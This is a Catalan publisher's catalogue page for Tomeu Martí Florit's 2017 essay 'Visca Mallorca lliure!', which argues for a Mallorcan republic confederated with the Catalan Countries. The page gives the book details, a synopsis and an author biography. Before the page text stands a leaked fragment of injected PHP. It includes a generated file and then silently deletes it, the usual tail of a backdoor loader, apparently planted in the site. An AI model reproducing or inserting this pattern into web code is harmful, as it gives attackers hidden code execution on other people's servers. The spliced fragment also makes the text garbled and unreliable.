");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Visca Mallorca lliure!
Cercador d'Obres
ORDENAR:
Començar recerca

Visca Mallorca lliure!

Cap a una república confederada dels Països Catalans

Martí Florit, Tomeu

Prologuista:
Anna Gabriel i Sabaté
Col·lecció:
Papers
Tema:
Assaig
Pàgines:
136
PVP:
12.00
ISBN:
978-84-16163-91-5
Data d'Edició:
29/04/2017
Mallorquinisme, autonomia, estat, confederació, nació catalana, república, independència, Països Catalans... són alguns dels seus referents.
Sinopsi
Visca Mallorca lliure! és el crit històric, la divisa que uneix les persones i col·lectius que treballen amb l’objectiu de fer de Mallorca un país de gent lliure i feliç. Tomeu Martí converteix aquest crit en una crida a pensar i preparar el futur de Mallorca amb els màxims nivells de sobirania i benestar col·lectiu.
El mallorquinisme polític, des dels seus inicis, ha cercat sempre un encaix entre els territoris històrics dels Països Catalans i ha proposat el màxim d’autogovern. Un debat sobre Mallorca, mallorquinisme, autonomia, estat, confederació, nació catalana, república, independència, Països Catalans, llibertat... són alguns dels referents que planteja aquest treball.
És l’oportunitat per proposar la construcció d’una república al servei dels ciutadans i ciutadanes de Mallorca, confederada amb la resta de territoris de la Nació Catalana. Ha arribat el moment de fer de Mallorca el millor país del món. Tomeu Martí, amb el bagatge que li atorga l’experiència d’activista, selecciona les eines més efectives per enllestir aquesta meta.
Com diu la diputada de la CUP Anna Gabriel en el pròleg del llibre, «agafeu el llibre, llapis en mà, i treballeu el país».


Llegiu el SumariTomeu Martí Florit
(Palma, 1969)
Ha treballat com a periodista a S'Arenal de Mallorca, al diari El Punt, al setmanari La Nau i a la revista Quatre Illes. Ha col·laborat en una vintena de publicacions més. Actualment, és col·laborador habitual de la revista El Mirall, de Diari de Balears i de Tribuna Catalana, i és director de la revista de Son Sardina Coses Nostres. Ha publicat els llibres d’assaig La lluita contra el servei militar a Mallorca (1995) i SUS Mallorca, manifest de futur (2006); els llibres de poemes Vocabulari del plor (1994), Quaranta-nou dies amb Nausica (1998) i Retorn a la utopia (2001); el recull d’articles Articles salats (2004), i els opuscles Amb la mà esquerra contra la guerra (2003) i Per la refundació del nacionalisme a Mallorca (2004). També ha participat en els llibres col·lectius Es prega que tanqueu les portes de l’ascensor (1994), Poetes de Mallorca per la Llengua (1999), Paraula de poesia (1999),  Diguem No (2005), Països Catalans en plural (2005) 13 x 3, poesia perifèrica (2006). Paradís topical (2007). El grup de música popular Al Mayurqa va musicar el seu poema «Adéu amic!». Llibertat i llengua, 100 reflexions sobre el català a les Illes Balears (2010), La revolta dels enllaçats (2013) i Visca Mallorca lliure! (2017).


Recomanar
Comentar
Comentaris (0)